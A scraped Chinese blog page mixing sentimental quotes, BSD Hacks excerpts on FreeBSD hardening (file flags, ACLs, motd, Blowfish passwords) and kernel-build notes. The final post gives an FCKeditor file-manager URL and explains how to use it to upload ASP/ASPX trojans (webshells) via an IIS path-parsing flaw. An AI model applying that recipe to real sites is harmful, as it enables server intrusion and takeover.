飘零的代码 piao2010 ’s blog

今天整理电脑的时候无意间看见曾经收藏的一篇文章，拿出来凑个数更新一下博客。

第一句
如果我们之间有1000步的距离　
你只要跨出第1步
我就会朝你的方向走其余的999步

第二句
通常愿意留下来跟你争吵的人　
才是真正爱你的人

第三句
read more »

When Figure 6-1 summarizes the flags, their meanings, and their usual usage.[Hack #58] shows how to create your own file integrity checking program that will alert you if any of your binaries or other important files are changed. An additional layer of protection is to use chflags to prevent those files from being changed in the first place. Usually, the schg

• /usr/bin, which contains user programs

• /usr/sbin, which contains system programs

• /etc, which contains system configurations

Again, evaluate your particular scenario before implementing this flag. The protection provided by this flag usually far outweighs the inconvenience. The only time the contents of /usr/bin or /usr/sbin should change is when you upgrade the operating system or rebuild your world. Doing that requires a reboot anyway, so dropping to single-user mode to unset schg shouldn’t be a problem.

How often do you change your configuration files in /etc? If you typically configure a system only when it is installed and rarely make changes afterward, protect your configurations with schg. However, keep in mind that a rare configuration change may require you to drop all connections in order to implement it. Also, if you need to add more users to your system, remember to remove that flag from /etc/passwd, /etc/master.passwd, and /etc/group first.

Things are a bit more problematic for a system running installed applications. Most ports install their binaries into /usr/local/bin or /usr/X11R6/bin. If you set the schg flag on those directories, you won’t be able to patch or upgrade those binaries unless you temporarily unset the flag. You’ll have to balance your need to keep your server up and running with the protection you gain from the schg flag and how often you have to patch a particular binary.

6.4.6 Controlling Backups

The last two arch and nodump, affect backups. The arch flag.

Similarly, when using dump to back up an entire filesystem, the superuser can specify which portions of that filesystem will not be included by setting the nodump flag.

6.4.7 See Also

• man securelevel

• man -a chflags (to view all manpages that match chflags, not just the

• man newsyslog

ACLs

Edit the superblock with the

# shutdown now*** FINAL System shutdown message from root@mycompany.com ***System going down IMMEDIATELYDec 11 10:28:07 genisis shutdown: shutdown by root:System shutdown time has arrivedWriting entropy file:.Shutting down daemon processes:.Saving firewall state tables:.Dec 11 10:28:10 genisis syslogd: exiting on signal 15Enter full pathname of shell or RETURN for /bin/sh:#

At the prompt, type:

# /sbin/tunefs -a enable /# /sbin/tunefs -a enable /usr# exit

Things [Hack #54] . Don’t reboot yet; you still need to initialize the extended attributes on each file system.

For example, to initialize extended attributes on the /var filesystem, use

# mkdir -p /var/.attribute/system# cd /var/.attribute/system# extattrctl initattr -p /var 388 posix1e.acl_access# extattrctl initattr -p /var 388 posix1e.acl_default

Okay, you’ve successfully enabled ACLs. Now what? Let’s start by viewing ACLs. Looking at ACLs is simple. Files with ACLs will be designated with a + in the long listing provided by ls -l:

% ls -l acl-test-rw-rw-r–+ 1 rob rob 0 Apr 19 17:27 acl-test

Use the

% getfacl acl-test#file:acl-test#owner:1000#group:1000user::rw-user:nobody:rw-group::r–group:wheel:rw-mask::rw-other::r–

The user::, group::, and other:: fields should all be familiar. They are simply the ACL representations of the standard Unix nobody and wheel lines, however, are new. These specify permissions for specific users and groups (in this case, the nobody user and the wheel group) in addition to the normal set of permissions.

The mask field sets maximum permissions, so an r– mask (set with m::r) in combination with an rw- permission for a user will give the user only r– permissions on the file.

 

The chmod, only the file’s owner or the superuser can use this command. You only need to use a few of its options to start manipulating ACLs.

First, a word on syntax. ACLs are specified just as they’re printed by getfacl. Let’s remove and reconstruct the ACL for acl-test:

% setfacl -b acl-test% setfacl -m user:nobody:rw-,group:wheel:rw- acl-test

The -b option removes all ACLs, except for the standard user, group, and other lines. The -m option modifies the ACL with the specified entry (or comma-separated entries). Entries may also be abbreviated: the code here could have been shortened to u:nobody:rw-,g:wheel:rw-.

You can even use setfacl to modify traditional permissions; setting a user::rw- ACL entry is equivalent to running chmod u=rw on a file.

Removing ACLs is almost identical: setfacl -x u:nobody:rw-,g:wheel:rw- removes that ACL. You can also specify ACLs in files. The -M and -X options perform the functions of their lowercase relatives, but read their entries from a file. Consider the acl-test file again:

% cat test-acl-listu:nobody:rw-# this is a commentg:wheel:rw-% setfacl -X test-acl-list acl-test% getfacl acl-test#file:acl-test#owner:1000#group:1000user::rw-group::r–mask::r–other::r–

网上没下载到中文版的，所以只能拿英文版的做一下摘记吧。

 

Let’s start with the copyright information. That’s this part of the default login process:

Copyright (c) 1992-2003 The FreeBSD Project.

Copyright (c) 1979, 1980, 1983, 1986, 1988, 1989, 1991, 1992, 1993, 1994

The Regents of the University of California. All rights reserved.

To prevent users from seeing this information, simply:

# touch /etc/COPYRIGHT

Technically, you could add your own information to /etc/COPYRIGHT instead of leaving it as an

empty file. However, it is common practice to put your information in /etc/motd instead. The

default /etc/motd contains very useful information to the new user, but it does get rather old

after a few hundred logins.

You can edit /etc/motd to say whatever suits your purposes—anything from your favorite sci-fi

excerpt to all the nasty things that will happen to someone if they continue to try to log into

your system. Here’s a very simple example:

# more /etc/motd

*********************************************************

*****            Authorized users only!!            *****

*********************************************************

You’ll note that after you customize your motd, users will still see this text prepended to it:

FreeBSD 5.1-RELEASE (GENERIC) #0: Thu Jun 5 02:55:42 GMT 2003

If you don’t want to advertise your operating system version and kernel information, you’ll need

one more hack. Add this line to /etc/rc.conf:

update_motd=”NO”

If you’re using FreeBSD 5.x, you no longer have to reboot or go into single-user mode to

initialize a change to /etc/rc.conf. Instead, you can use one of the many scripts available in

/etc/rc.d. Let’s see if there’s a script that deals with motd:

# ls -F /etc/rc.d | grep motd

motd*

Excellent. Let’s see what syntax that command expects:

# /etc/rc.d/motd

Usage: /etc/rc.d/motd [fast|force](start|stop|restart|rcvar)

Parameters in square brackets are optional, whereas parameters in parentheses are mandatory.

Notice each option is separated by the or symbol (|), meaning you just pick one out of the list.

In our case, we want to use the rcvar parameter. This will tell the motd script to reread its

setting in /etc/rc.conf:

# /etc/rc.d/motd rcvar

# motd

$update_motd=NO

To use Blowfish, start by opening up /etc/login.conf in your favorite editor. Look for this line:

:passwd_format=md5:\

Carefully edit it so it looks like this:

:passwd_format=blf:\

Check for typos before saving your change.

You may have noticed this comment when you modified /etc/login.conf:

# Remember to rebuild the database after each change to this file:

#

#        cap_mkdb /etc/login.conf

#

Let’s take a closer look at what we’re being asked to do. According to that comment, login.conf

is more than a configuration file, it is a database. Not only that, it is a capability database,

a database that supports different capabilities. That is the reason behind the weird syntax

within login.conf. Whenever you edit a capability database, you have to use the cap_mkdb command

to integrate your changes within the database.

So, follow the directions:

# cap_mkdb /etc/login.conf
If you have any existing users, you need to convert their passwords from MD5 to Blowfish. This is

why it’s a good idea to make the change before you create your users.

If you’ve already created users, it’s back to the password database to find all of the active

accounts. Inactive accounts—accounts that don’t allow logins—have the * character instead of an

encrypted password. Since we want to find all of the lines in the password database that do not

contain an asterisk, we need an inverted grep:

# grep -v ‘*’ /etc/master.passwd

root:$1$ywXbyPT/$GC8tXN91c.lsKRpLZori61:0:0::0:0:Charlie &:/root:/bin/csh

dru:$1$GFm1nh6I$jh3v4I.QNf450ARgltZU5.:1008:0::0:0:User &:/home/dru:/bin/csh

Well, that worked, but we could make the output look much prettier:

# grep -v ‘*’ /etc/master.passwd | cut -d ‘:’ -f 1

root

dru

Let’s pick apart that command syntax. grep -v creates a reverse filter. In effect, it says, “Show

me the lines in /etc/master.passwd that do not contain an *.” Since those lines are long and

contain much more than just the username, I piped the output to the cut utility to literally cut

out the portions I don’t need to see. Notice that the usernames are the very first thing in each

line, and they are always followed by the : field separator. -d tells cut to consider the colon

character, not the tab character, as the separator. -f 1 tells cut that I’m interested in the

very first field of that line.

It looks like my particular system has two active accounts: root and dru. Notice in the original

output the long sequence of characters that starts with $1 and ends with :. No, my users’

passwords aren’t quite that complex. Rather, you’re seeing the password after it’s been encrypted

by the MD5 algorithm. That $1 means MD5. It’ll be $2 after we switch to Blowfish encryption. (Be

aware that you can’t edit the file directly; the entire password must be changed.)

I’ll now change those two passwords:

# passwd dru

Changing local password for dru

New Password:

Retype New Password:

 

# passwd

Changing local password for root

New Password:

Retype New Password:

Note that the superuser can change any user’s password by specifying the appropriate username. If

you don’t specify a name, you will instead change the root password.

When you’re finished, repeat the original grep -v command and double-check that all of the

encrypted passwords now start with $2.
Finally, configure the adduser utility to use Blowfish whenever you create a new user by editing

/etc/auth.conf. Look for this line:

# crypt_default = md5 des

and carefully change it to:

crypt_default = blf

Once you’ve saved your change, test it by creating a new user. The easiest way to do this is to

type adduser and follow the prompts.

 

 

参考书籍:FreeBSD 使用手册，BSD HACKS

首先进入目录

# cd /usr/src/sys/i386/conf

复制一份配置文件命名为HACKER-PIAO
# cp GENERIC HACKER-PIAO

如果说不存在这个目录的话可以进行如下操作:

#sysinstall， 选择 Configure， 然后是 Distributions、 src，选中其中的 base 和 sys。 如果您不喜欢 sysinstall 并且有一张 “官方的” FreeBSD CDROM， 也可以使用下列命令， 从命令行来安装源代码：# mount /cdrom# mkdir -p /usr/src/sys# ln -s /usr/src/sys /sys# cat /cdrom/src/ssys.[a-d]* | tar -xzvf -# cat /cdrom/src/sbase.[a-d]* | tar -xzvf -       

接下来定制内核 HACKER-PIAO 主要是参考使用手册和BSD HACKS,这里我列出一小部分设置,其它设置可以参看当前目录下的NOTES文件

makeoptions COPTFLAGS=”-O2 -pipe -funroll-loops -ffast-math”
options  DEVICE_POLLING
options  HZ=1000options  IPFIREWALL
options  DUMMYNET###远程SSH配置时请用accept
options  IPFIREWALL_DEFAULT_TO_ACCEPT
options  IPDIVERToptions  IPFIREWALL_VERBOSE
options  IPFIREWALL_VERBOSE_LIMIT=100
options  IPSTEALTH
options  ACCEPT_FILTER_DATA
options  ACCEPT_FILTER_HTTP
#options ICMP_BANDLIM      #貌似7.0不支持这个参数#防火墙和流量控制结束其它设置我不列举出来了.

其它设置我就不列举了

进入 /usr/src 目录：

# cd /usr/src
编译内核：

# make buildkernel KERNCONF=HACKER-PIAO

等待N久….如果出错可以根据提示信息修改相应配置

安装新内核：（这步还是挺快的）

# make installkernel KERNCONF=HACKER-PIAO

 

重启系统

#shutdown -r now

如果不出现错误的话就成功了。o(∩_∩)o…

半天时间就这样过去了，不过还是比较值得的，学到很多东东。

http://websiteX/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马，利用2003路径解析漏洞，也可以直接上传ASP木马。

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如：

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp